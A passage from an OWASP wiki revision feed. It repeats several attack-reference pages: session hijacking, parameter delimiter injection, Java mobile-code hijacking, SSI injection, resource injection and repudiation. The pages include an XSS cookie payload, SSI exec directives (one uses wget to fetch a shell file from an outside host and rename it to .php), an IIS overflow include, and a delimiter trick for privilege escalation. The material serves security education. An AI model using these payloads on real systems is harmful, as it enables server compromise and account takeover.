[[Image:Code_Injection.JPG]] <br />
<br />
Figure 3. Code injection.<br />
</center><br />
<br />
<br />
'''Other Examples'''<br />
The following attacks acts intercepting the information exchange between the client and the server<br />
<br />
Man-in-the-middle<br />
*[[Man-in-the-middle attack]]<br />
<br />
Man-in-the-browser<br />
*[[Man-in-the-browser attack]]<br />
<br />
<br />
== External References==<br />
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm<br />
* http://en.wikipedia.org/wiki/HTTP_cookie<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Authorization]]<br />
<br />
==Related Attacks==<br />
<br />
* [[Man-in-the-middle attack]]<br />
* [[Session Prediction]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category:Session Management]]<br />
<br />
<br />
[[Category:Session Management]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Session_hijacking_attack&diff=23085Session hijacking attack2007-11-05T17:21:35Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. <br />
<br />
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.<br />
<br />
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.<br />
<br />
The session token could be compromised in different ways, the most common are:<br />
<br />
• Predictable session token;<br />
<br />
• Session Sniffing;<br />
<br />
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);<br />
<br />
• Man-in-the-middle attacks.<br />
<br />
•Man-in-the-browser attacks<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Examples ==<br />
<br />
===Example 1===<br />
====Session Sniffing====<br />
<br />
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. <br />
<br />
<br />
<center><br />
[[Image:Session_Hijacking_3.JPG]] <br />
<br />
Figure 2. Manipulating the token session executing the session hijacking attack.<br />
</center><br />
<br />
===Example 2===<br />
====Cross-site script attack====<br />
<br />
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.<br />
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: <br />
<br />
<SCRIPT>alert(document.cookie);</SCRIPT><br />
<br />
<br />
<center><br />
[[Image:Code_Injection.JPG]] <br />
<br />
Figure 3. Code injection.<br />
</center><br />
<br />
<br />
'''Other Examples'''<br />
The following attacks acts intercepting the information exchange between the client and the server<br />
<br />
Man-in-the-middle<br />
*[[Man-in-the-middle attack]]<br />
<br />
Man-in-the-browser<br />
*[[Man-in-the-browser attack]]<br />
<br />
<br />
== External References==<br />
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm<br />
* http://en.wikipedia.org/wiki/HTTP_cookie<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Authorization]]<br />
<br />
==Related Attacks==<br />
<br />
* [[Man-in-the-middle attack]]<br />
* [[Session Prediction]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category:Session Management]]<br />
<br />
<br />
[[Category:Session Management]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Parameter_Delimiter&diff=23084Parameter Delimiter2007-11-05T17:20:08Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
This attack is based on manipulation of parameters delimiter used by web application input vectors, in order to cause unexpected behaviors like access control and authorization bypass, information disclosure, among others.<br />
<br />
==Severity==<br />
High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==Examples ==<br />
In order to illustrate this vulnerability, it’ll be used a vulnerability found on Poster V2, a posting system based on PHP programming language. <br />
<br />
This application has a dangerous vulnerability that allows inserting data into user fields (username, password, email address and privileges) in “mem.php” file, which is responsible for managing application user.<br />
<br />
An example of the file “mem.php”, where user Jose has admin privileges and Alice user access:<br />
<br />
<?<br />
Jose|12345678|jose@attack.com|admin|<br />
Alice|87654321|alice@attack.com|normal|<br />
?><br />
<br />
When a user wants to edit his profile, he must use edit account” option in the “index.php” page and enter his login information. However, using “|” as a parameter delimiter on email field followed by “admin”, the user could elevate his privileges to administrator. Example:<br />
<br />
Username: Alice<br />
Password: 87654321<br />
Email: alice@attack.com |admin| <br />
<br />
This information will be recorded in “mem.php” file like this: <br />
<br />
Alice|87654321|alice@attack.com|admin|normal|<br />
<br />
In this case, the last parameter delimiter considered is “|admin|” and the user could elevate his privileges by assigning administrator profile.<br />
<br />
Although this vulnerability doesn’t allow manipulation of others user profiles, it allows privilege escalation for application users.<br />
<br />
==External References==<br />
*http://cwe.mitre.org/data/definitions/141.html<br />
*http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307<br />
<br />
==Related Threats==<br />
[[:Category: Authorization]]<br />
[[:Category: Command Execution]]<br />
<br />
==Related Attacks==<br />
[[:Category:Injection Attack]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category: Input Validation Vulnerability]]<br />
<br />
[[Category:Injection]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Session_hijacking_attack&diff=23083Session hijacking attack2007-11-05T17:19:16Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. <br />
<br />
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.<br />
<br />
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.<br />
<br />
The session token could be compromised in different ways, the most common are:<br />
• Predictable session token<br />
• Session Sniffing<br />
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)<br />
• Man-in-the-middle attacks<br />
• Man-in-the-browser attacks<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Very High<br />
<br />
==Examples ==<br />
<br />
===Example 1===<br />
====Session Sniffing====<br />
<br />
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. <br />
<br />
<br />
<center><br />
[[Image:Session_Hijacking_3.JPG]] <br />
<br />
Figure 2. Manipulating the token session executing the session hijacking attack.<br />
</center><br />
<br />
===Example 2===<br />
====Cross-site script attack====<br />
<br />
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.<br />
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: <br />
<br />
<SCRIPT>alert(document.cookie);</SCRIPT><br />
<br />
<br />
<center><br />
[[Image:Code_Injection.JPG]] <br />
<br />
Figure 3. Code injection.<br />
</center><br />
<br />
<br />
'''Other Examples'''<br />
The following attacks acts intercepting the information exchange between the client and the server<br />
<br />
Man-in-the-middle<br />
*[[Man-in-the-middle attack]]<br />
<br />
Man-in-the-browser<br />
*[[Man-in-the-browser attack]]<br />
<br />
<br />
== External References==<br />
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm<br />
* http://en.wikipedia.org/wiki/HTTP_cookie<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Authorization]]<br />
<br />
==Related Attacks==<br />
<br />
* [[Man-in-the-middle attack]]<br />
* [[Session Prediction]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category:Session Management]]<br />
<br />
<br />
[[Category:Session Management]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Mobile_code:_object_hijack&diff=23082Mobile code: object hijack2007-11-05T17:16:54Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
This attack consists in a technique to create objects without constructors’ methods by taking advantage of clone() method of Java based applications.<br />
<br />
Case a certain class implements cloneable() method declared as public, but doesn’t has a public constructor method nor declared as final, it is possible to extent it into a new class and create objects using the clone() method.<br />
<br />
The clonable() method certificates that the clone() method functions correctly. A cloned object has the same attributes (variables values) that the original object, but the objects are independents.<br />
<br />
==Severity==<br />
Medium to High<br />
<br />
==Likelihood of exploitation==<br />
Medium<br />
<br />
==Examples==<br />
In this example, a public class “BankAccount” implements the clonable() method which declares “Object clone(string accountnumber)”:<br />
<br />
public class BankAccount implements Cloneable{<br />
public Object clone(String accountnumber) throws <br />
CloneNotSupportedException<br />
{<br />
Object returnMe = new BankAccount(account number);<br />
…<br />
}<br />
}<br />
<br />
An attacker can implement a malicious public class that extends the parent BankAccount class, as follows: <br />
<br />
public class MaliciousBankAccount extends BankAccount implements <br />
Cloneable{<br />
public Object clone(String accountnumber) throws CloneNotSupportedException <br />
{<br />
Object returnMe = super.clone();<br />
…<br />
}<br />
}<br />
<br />
A Java applet from certain application is acquired and subverted by an attacker. Then, he makes the victim accepts and runs a Trojan or malicious code that was prepared to manipulate objects’ state and behavior. This code is instantiated and executed continuously using default JVM on victim’s machine. When the victim invokes the Java applet from the original application using the same JVM, then the attacker clones the class, he manipulates the attributes values and after that substitutes the original object for the malicious one.<br />
<br />
==External References==<br />
<br />
http://cwe.mitre.org/data/definitions/491.html - Mobile Code: Object Hijack<br />
http://www.fortifysoftware.com/vulncat/ - Object Model Violation: Erroneous clone() Method<br />
<br />
==Related Threats==<br />
[[:Category: Logical Attacks]]<br />
<br />
<br />
==Related Attacks==<br />
*[[Mobile code: invoking untrusted mobile code]]<br />
*[[Mobile code: non-final public field]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
[[:Category: Unsafe Mobile Code]]<br />
<br />
==Related Countermeasures==<br />
[[:Category: Session Management]]<br />
<br />
<br />
[[Category:Abuse of Functionality]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=23081Server-Side Includes (SSI) Injection2007-11-05T17:15:05Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
<br />
==Description==<br />
<br />
SSIs are directives present on Web applications used to feed a HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some action before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. <br />
<br />
The Server-Side Include attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited thru manipulation of SSI in use on the application or forcing its use thru user input fields. <br />
<br />
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:<br />
<br />
< ! # = / . " - > and [a-zA-Z0-9] <br />
<br />
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.<br />
<br />
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under permission of web server process owner.<br />
<br />
The attack possibilities that the intruder can gain access sensitive information, as password files and execute shell commands. The SSIs directives are inject in input fields and they are sent to the web server. The web server parses and executes the directives, before supplying the page. Then, the attack result will be viewable the next time that the page will be loaded for user browser.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to High<br />
<br />
== Examples ==<br />
<br />
=== Example 1===<br />
<br />
The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands. <br />
<br />
'''Linux:'''<br />
<br />
List files of directory:<br />
<br />
< !--#exec cmd="ls" --><br />
<br />
Access directories:<br />
<br />
<!--#exec cmd="cd /root/dir/"><br />
<br />
Execution script:<br />
<br />
< !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --><br />
<br />
'''Windows:'''<br />
<br />
List files of directory:<br />
<br />
< !--#exec cmd="dir" --><br />
<br />
Access directories:<br />
<br />
< !--#exec cmd="cd C:\admin\dir"><br />
<br />
===Example 2===<br />
<br />
Other SSI examples that can be used to access and set server information:<br />
<br />
To change the error message output:<br />
<br />
<nowiki><!--#config errmsg="File not found, informs users and password"--></nowiki><br />
<br />
To show current document filename:<br />
<br />
<nowiki><!--#echo var="DOCUMENT_NAME" --></nowiki><br />
<br />
To show virtual path and filename:<br />
<br />
<nowiki><!--#echo var="DOCUMENT_URI" --></nowiki><br />
<br />
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:<br />
<br />
<nowiki><!--#config timefmt="A %B %d %Y %r"--></nowiki><br />
<br />
Using the “fsize” command, it is possible to print the size of selected file:<br />
<br />
<nowiki><!--#fsize file="ssi.shtml" --></nowiki><br />
<br />
===Example 3===<br />
<br />
An old vulnerability in the IIS versions 4.0 and 5.0 allows that an attacker obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. <br />
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].<br />
<br />
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack: <br />
<br />
ssi_over.shtml<br />
<br />
<nowiki><!--#include file=”UUUUUUUU...UU”--></nowiki><br />
<br />
PS: The number of “U” needs to be longer than 2049.<br />
<br />
Forcing application to load the ssi_over.shtml page:<br />
<br />
Non-malicious URL:<br />
<br />
<nowiki>www.vulnerablesite.org/index.asp?page=news.asp</nowiki><br />
<br />
Malicious URL:<br />
<nowiki>www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml</nowiki><br />
<br />
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.<br />
<br />
==External References==<br />
<br />
http://www.students.mines.edu/examples/ - CGI and SSI Examples<br />
<br />
http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Command Execution]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Code Injection]] <br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
[[Category:Injection]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=23080Server-Side Includes (SSI) Injection2007-11-05T17:14:25Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
<br />
==Description==<br />
<br />
SSIs are directives present on Web applications used to feed a HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some action before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. <br />
<br />
The Server-Side Include attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited thru manipulation of SSI in use on the application or forcing its use thru user input fields. <br />
<br />
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:<br />
<br />
< ! # = / . " - > and [a-zA-Z0-9] <br />
<br />
<br />
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.<br />
<br />
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under permission of web server process owner.<br />
<br />
The attack possibilities that the intruder can gain access sensitive information, as password files and execute shell commands. The SSIs directives are inject in input fields and they are sent to the web server. The web server parses and executes the directives, before supplying the page. Then, the attack result will be viewable the next time that the page will be loaded for user browser.<br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to High<br />
<br />
== Examples ==<br />
<br />
=== Example 1===<br />
<br />
The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands. <br />
<br />
'''Linux:'''<br />
<br />
List files of directory:<br />
<br />
< !--#exec cmd="ls" --><br />
<br />
Access directories:<br />
<br />
<!--#exec cmd="cd /root/dir/"><br />
<br />
Execution script:<br />
<br />
< !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --><br />
<br />
'''Windows:'''<br />
<br />
List files of directory:<br />
<br />
< !--#exec cmd="dir" --><br />
<br />
Access directories:<br />
<br />
< !--#exec cmd="cd C:\admin\dir"><br />
<br />
===Example 2===<br />
<br />
Other SSI examples that can be used to access and set server information:<br />
<br />
To change the error message output:<br />
<br />
<nowiki><!--#config errmsg="File not found, informs users and password"--></nowiki><br />
<br />
To show current document filename:<br />
<br />
<nowiki><!--#echo var="DOCUMENT_NAME" --></nowiki><br />
<br />
To show virtual path and filename:<br />
<br />
<nowiki><!--#echo var="DOCUMENT_URI" --></nowiki><br />
<br />
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:<br />
<br />
<nowiki><!--#config timefmt="A %B %d %Y %r"--></nowiki><br />
<br />
Using the “fsize” command, it is possible to print the size of selected file:<br />
<br />
<nowiki><!--#fsize file="ssi.shtml" --></nowiki><br />
<br />
===Example 3===<br />
<br />
An old vulnerability in the IIS versions 4.0 and 5.0 allows that an attacker obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. <br />
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].<br />
<br />
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack: <br />
<br />
ssi_over.shtml<br />
<br />
<nowiki><!--#include file=”UUUUUUUU...UU”--></nowiki><br />
<br />
PS: The number of “U” needs to be longer than 2049.<br />
<br />
Forcing application to load the ssi_over.shtml page:<br />
<br />
Non-malicious URL:<br />
<br />
<nowiki>www.vulnerablesite.org/index.asp?page=news.asp</nowiki><br />
<br />
Malicious URL:<br />
<nowiki>www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml</nowiki><br />
<br />
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.<br />
<br />
==External References==<br />
<br />
http://www.students.mines.edu/examples/ - CGI and SSI Examples<br />
<br />
http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples<br />
<br />
==Related Threats==<br />
<br />
[[:Category:Command Execution]]<br />
<br />
==Related Attacks==<br />
<br />
*[[Code Injection]] <br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
<br />
[[Category:Injection]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Mobile_code:_non-final_public_field&diff=23079Mobile code: non-final public field2007-11-05T17:14:24Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
This attack aims to manipulate non-final public variables used in mobile code by injecting malicious values on it, mostly in Java and C++ applications.<br />
<br />
When a public member variable or class used in mobile code isn’t declared as final, its values can be malicious manipulated by any function that has access to it in order to extend the application code or acquire critical information about the application. <br />
<br />
==Severity==<br />
Medium to High<br />
<br />
==Likelihood of exploitation==<br />
Low<br />
<br />
==Examples==<br />
A Java applet from certain application is acquired and subverted by an attacker. Then, he makes the victim accepts and runs a Trojan or malicious code that was prepared to manipulate non-final objects’ state and behavior. This code is instantiated and executed continuously using default JVM on victim’s machine. When the victim invokes the Java applet from the original application using the same JVM, the malicious process could be mixed with original applet, thus it modifies values of non-final objects and executes under victim’s credentials.<br />
<br />
In the following example, the class “any_class” is declared as final and “server_addr” variable is not:<br />
<br />
public final class any_class extends class_Applet {<br />
public URL server_addr;<br />
…<br />
}<br />
<br />
In this case, the value of “server_addr” variable could be set by any other function that has access to it, thus changing the application behavior.<br />
A proper way to declare this variable is:<br />
<br />
public class any_class extends class_Applet {<br />
public final URL server_addr;<br />
…<br />
}<br />
<br />
When a variable is declared as final its value cannot be modified.<br />
<br />
==External References==<br />
http://cwe.mitre.org/data/definitions/493.html – Mobile Code: non-final public field<br />
http://www.fortifysoftware.com/vulncat/ - Unsafe Mobile Code: Access Violation<br />
http://www.fortifysoftware.com/vulncat/ - Unsafe Mobile Code: Public finalize() Method<br />
<br />
==Related Threats==<br />
[[:Category: Logical Attacks]]<br />
<br />
==Related Attacks==<br />
*[[Mobile code: invoking untrusted mobile code]]<br />
*[[Mobile code: object hijack]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category: Unsafe Mobile Code]]<br />
<br />
==Related Countermeasures==<br />
[[:Category: Access Control]]<br />
<br />
[[Category:Abuse of Functionality]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Resource_Injection&diff=23078Resource Injection2007-11-05T17:10:09Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
This attack consists in changing resources identifiers used by application in order to perform malicious task. When an application permits a user input to define a resource, like file name or port number, this data can be manipulated to execute or access different resources.<br />
<br><br />
In order to be properly executed, the attacker must have the possibility to specify a resource identifier thru application form and the application must permit its execution.<br />
<br />
The resource type affected by user input indicates the content type that may be exposed. For example, an application that permits input of special characters like period, slash, and backslash are risky when used in methods that interact with the file system.<br />
<br />
The resource injection attack focus on accessing other resources than local filesystem, whose is done thru a different attack technique known as [[Path Manipulation]] attack.<br><br />
<br />
== Severity ==<br />
<br />
High<br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium<br />
<br />
==Examples ==<br />
<br />
===Example 1===<br />
The following examples represent an application which gets a port number from HTTP request and create a socket with this port number without any validation. A user using a proxy can modify this port and obtain a direct connection (socket) with the server.<br />
<br><br><br />
<br />
'''Java code:'''<br />
<br />
String rPort = request.getParameter("remotePort");<br />
...<br />
ServerSocket srvr = new ServerSocket(rPort);<br />
Socket skt = srvr.accept(); <br />
...<br />
<br />
<br><br />
'''.Net code:'''<br />
<br />
int rPort = Int32.Parse(Request.get_Item("remotePort "));<br />
...<br />
IPEndPoint endpoint = new IPEndPoint(address,rPort);<br />
socket = new Socket(endpoint.AddressFamily, <br />
SocketType.Stream, ProtocolType.Tcp);<br />
socket.Connect(endpoint);<br />
...<br />
<br />
===Example 2===<br />
This example is same as previous, but it gets port number from CGI requests using C++:<br />
<br />
char* rPort = getenv("remotePort ");<br />
...<br />
serv_addr.sin_port = htons(atoi(rPort));<br />
if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) <br />
error("ERROR connecting");<br />
...<br />
<br />
===Example 3===<br />
This example in PLSQL / TSQL gets a URL path from a CGI and downloads the file contained on it. If a user modify the path or filename it’s possible to download arbitrary files from server:<br />
...<br />
filename := SUBSTR(OWA_UTIL.get_cgi_env('PATH_INFO'), 2);<br />
WPG_DOCLOAD.download_file(filename); <br />
...<br />
<br />
== External References==<br />
http://samate.nist.gov/SRD/view_testcase.php?login=Guest&tID=1734 <br><br />
<br />
http://cwe.mitre.org/data/definitions/99.html <br><br />
<br />
http://capec.mitre.org/data/index.html#Definition <br><br />
<br />
http://www.fortifysoftware.com/vulncat/ <br><br />
<br />
G. Hoglund and G. McGraw. Exploiting Software. Addison-Wesley, 2004.<br />
<br />
==Related Threats==<br />
[[:Category:Logical Attacks]]<br />
<br />
[[:Category: Information Disclosure]]<br />
<br />
==Related Attacks==<br />
*[[Path Traversal]]<br />
*[[Path Manipulation]]<br />
*[[Relative Path Traversal]]<br />
*[[:Category:Injection Attack | Injection Attacks]]<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category:Input Validation Vulnerability]]<br />
<br />
==Related Countermeasures==<br />
[[:Category:Input Validation]]<br />
<br />
<br />
[[Category: Injection Attack]]<br />
<br />
[[Category: Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&diff=23077Mobile code: invoking untrusted mobile code2007-11-05T17:09:19Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
This attack consists on manipulation of a mobile code in order to execute malicious operations at the client side. By intercepting client traffic using “man-in-the-middle” technique, a malicious user could modify the original mobile code with arbitrary operations that will be executed on client’s machine under his credentials. <br />
In other scenario, the malicious mobile code could be hosted in an untrustworthy web site or it could be permanently injected on a vulnerable web site thru an injection attack.<br />
This attack can be performed over Java or C++ applications and affects any operational system.<br />
<br />
==Severity==<br />
Medium to High<br />
<br />
==Likelihood of exploitation==<br />
Low<br />
<br />
==Examples ==<br />
<br><br />
The following code demonstrates how this attack could be performed using a Java applet. <br />
<br />
<pre><br />
// here declarer a object URL with the path of the malicious class<br />
URL[] urlPath= new URL[]{new URL("file:subdir/")};<br />
<br />
// here generate a object “loader” which is responsible to load a class in the URL path<br />
URLClassLoader classLoader = new URLClassLoader(urlPath); <br />
<br />
//here declare a object of a malicious class contained in “classLoader”<br />
Class loadedClass = Class.forName("loadMe", true, classLoader);<br><br><br />
</pre><br />
<br />
==External References==<br />
*https://buildsecurityin.us-cert.gov/daisy/bsi/100/version/1/part/4/data/CLASP_ApplicationSecurityProcess.pdf?branch=main&language=default <br />
*http://cwe.mitre.org/data/definitions/494.html<br />
<br />
==Related threats==<br />
[[:Category: Logical Attacks]]<br />
<br />
==Related Attacks==<br />
*[[Mobile code: non-final public field]]<br />
*[[Mobile code: object hijack]]<br />
<br />
==Related Vulnerabilities==<br />
[[:Category: Unsafe Mobile Code]]<br />
<br />
==Related Countermeasures==<br />
To solve this issue, it’s necessary to use some type of integrity mechanism to assure that the mobile code has not been modified.<br />
<br />
[[Category: Abuse of Functionality]]<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Repudiation_Attack&diff=23076Repudiation Attack2007-11-05T17:04:11Z<p>Nsrav: </p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
<br />
Repudiation is the act of refuse authoring of something that happened. A repudiation attack happens when an application or system do not adopt controls to properly track and log users actions, thus permitting malicious manipulation or forging the identification of new actions.<br />
This attack can be used to change the authoring information of actions executed by a malicious user in order to log wrong data to log files. Its usage can be extended to general data manipulation in name of others, in a similar manner as spoofing mails messages.<br />
If this attack takes place, the data stored on log files can be considered invalid or misleading.<br />
<br />
== Severity ==<br />
<br />
High <br />
<br />
== Likelihood of exploitation ==<br />
<br />
Medium to Low<br />
<br />
==Examples ==<br />
<br />
Consider a web application that makes access control and authorization based on SESSIONID, but register user actions based on user parameter defined on Cookie header, as follows:<br />
<br />
POST <nowiki>http://someserver/Upload_file.jsp</nowiki> HTTP/1.1<br />
Host: tequila:8443<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4) <br />
Gecko/20070515 Firefox/2.0.0.4<br />
Accept:<br />
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Connection: keep-alive<br />
Referer: <nowiki>http://someserver/uploads.jsp</nowiki><br />
'''Cookie: JSESSIONID=EE3BD1E764CD6EED280426128201131C; <br />
user=leonardo'''<br />
Content-Type: multipart/form-data; boundary=--------------------------- <br />
263152394310685<br />
Content-Length: 321<br />
<br />
And the log file is composed by:<br />
<br />
Date, Time, Source IP, Source port, Request, User<br />
<br />
Once user information is acquired from user parameter on HTTP header, a malicious user could make use of a local proxy (eg:paros) and change it by a known or unknown username.<br />
<br />
<br />
== External References==<br />
<br />
http://capec.mitre.org/data/definitions/93.html - Log Injection-Tampering-Forging<br />
<br />
<br />
==Related Threats==<br />
<br />
[[:Category: Authorization]]<br />
<br />
[[:Category: Logical Attacks]]<br />
<br />
<br />
==Related Attacks==<br />
<br />
*[[Web Parameter Tampering]]<br />
<br />
<br />
==Related Vulnerabilities==<br />
<br />
[[:Category: Input Validation]]<br />
<br />
[[:Category: Access Control Vulnerability]]<br />
<br />
[[:Category: Logging and Auditing Vulnerability]]<br />
<br />
<br />
==Related Countermeasures==<br />
<br />
[[:Category: Logging]]<br />
<br />
[[:Category: Access Control]]<br />
<br />
<br />
[[Category:Resource Manipulation]]<br />
<br />
[[Category:Attack]]</div>Nsravhttps://wiki.owasp.org/index.php?title=Man-in-the-middle_attack&diff=23075Man-in-the-middle attack2007-11-05T17:02:50Z<p>Nsrav: /* Related Countermeasures */</p>
<hr />
<div>{{Template:attack}}<br />
<br />
==Description==<br />
The man-in-the middle attack acts intercepting a communication between two systems, for example, in the http transaction the target is the TCP connection between client and server.<br />
